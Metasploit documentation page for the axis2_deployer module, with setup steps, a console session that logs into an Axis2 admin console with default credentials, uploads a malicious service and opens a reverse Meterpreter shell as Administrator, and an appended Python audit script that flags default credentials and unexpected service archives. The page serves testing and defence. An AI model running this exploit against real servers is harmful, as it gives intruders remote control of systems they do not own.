GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/exploit/multi/http/axis2_deployer.md

Description

This module logs in to an Axis2 Web Admin Module instance with a specified username and password, then uploads and executes commands by deploying a malicious web service over SOAP.

Axis2 Web Admin

The Apache Axis2 Web application has three main sections: 'Services' lists all the available services deployed on this server; 'Validate' checks the system to see whether all the required libraries are in place and shows the system information; and 'Administration' is the Axis2 Web Administration module, the console for administering the Apache Axis2 installation. The Axis2 Web Administration module provides a way to configure Axis2 dynamically.

IMPORTANT: This dynamic configuration will NOT be persistent, i.e., if the servlet container is restarted, then all the dynamic configuration changes will be lost.

Verification Steps

  1. Do: use exploit/multi/http/axis2_deployer

  2. Do: set RHOSTS [IP]

  3. Do: set RPORT [PORT]

  4. Do: set USERNAME [Username]

  5. Do: set PASSWORD [Password]

  6. Do: run

Scenarios

```
msf > use exploit/multi/http/axis2_deployer
msf exploit(axis2_deployer) > set RHOST 10.10.155.37
RHOST => 10.10.155.37
msf exploit(axis2_deployer) > set RPORT 8080
RPORT => 8080
msf exploit(axis2_deployer) > set USERNAME admin
USERNAME => admin
msf exploit(axis2_deployer) > set PASSWORD admin123
PASSWORD => admin123
msf exploit(axis2_deployer) > exploit

[*] Started reverse TCP handler on 10.10.155.39:4444
[+] http://10.10.155.37:8080/axis2/axis2-admin [Apache-Coyote/1.1] [Axis2 Web Admin Module] successful login 'admin' : 'axis2'
[*] Successfully uploaded
[*] Polling to see if the service is ready
[*] Sending stage (30355 bytes) to 10.10.155.37
[*] Meterpreter session 3 opened (10.10.155.39:4444 -> 10.10.155.37:1750) at 2017-03-26 23:33:19 -0500
[*] NOTE: You will need to delete the web service that was uploaded.
[*] Using meterpreter:
[*] rm "webapps/axis2/WEB-INF/services/mdLFvgMv.jar"
[*] Using the shell:
[*] cd "webapps/axis2/WEB-INF/services"
[*] del mdLFvgMv.jar

meterpreter > getuid
Server username: Administrator
meterpreter > sysinfo
Computer : juan-6ed9db6ca8
OS : Windows 2003 5.2 (x86)
Meterpreter : java/java
meterpreter > exit
[*] Shutting down Meterpreter...
```
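The session above leaves two things a defender can check on the server: the Web Admin login that was accepted, and a new archive under `WEB-INF/services`. The following audit is an added example, not part of the module or its documentation. It assumes the admin credentials are the top-level `userName` and `password` parameters in `WEB-INF/conf/axis2.xml`, that the shipped default is `admin` / `axis2`, and that you keep a baseline list of expected service archives; the function names and the sample tree are constructed for illustration.

```python
import tempfile
import xml.etree.ElementTree as ET
from pathlib import Path

# Assumption: the axis2.xml shipped with Axis2 sets the Web Admin login to admin / axis2.
DEFAULT_CREDS = {("admin", "axis2")}
ARCHIVE_EXTS = {".aar", ".jar"}


def admin_credentials(axis2_xml: Path):
    """Return (userName, password) from the top-level <parameter> elements."""
    root = ET.parse(axis2_xml).getroot()
    params = {p.get("name"): (p.text or "").strip() for p in root.findall("parameter")}
    return params.get("userName"), params.get("password")


def audit(webinf: Path, baseline: set):
    """Return findings for one Axis2 WEB-INF directory."""
    findings = []
    if admin_credentials(webinf / "conf" / "axis2.xml") in DEFAULT_CREDS:
        findings.append("default admin credentials in conf/axis2.xml")
    # Any archive in services/ that is not in the baseline was deployed after it was taken.
    for f in sorted((webinf / "services").iterdir()):
        if f.suffix.lower() in ARCHIVE_EXTS and f.name not in baseline:
            findings.append(f"unexpected service archive: {f.name}")
    return findings


def demo():
    """Build a constructed WEB-INF tree (not a real server) and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        webinf = Path(tmp) / "WEB-INF"
        (webinf / "conf").mkdir(parents=True)
        (webinf / "services").mkdir()
        (webinf / "conf" / "axis2.xml").write_text(
            '<axisconfig name="AxisJava2.0">'
            '<parameter name="userName">admin</parameter>'
            '<parameter name="password">axis2</parameter>'
            "</axisconfig>"
        )
        # version.aar stands in for an expected service; the .jar name is from the session above.
        for name in ("version.aar", "mdLFvgMv.jar"):
            (webinf / "services" / name).write_bytes(b"")
        return audit(webinf, baseline={"version.aar"})


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

Because dynamic changes made through the admin console are not persistent, run the check against the files on disk rather than relying on what the console currently lists.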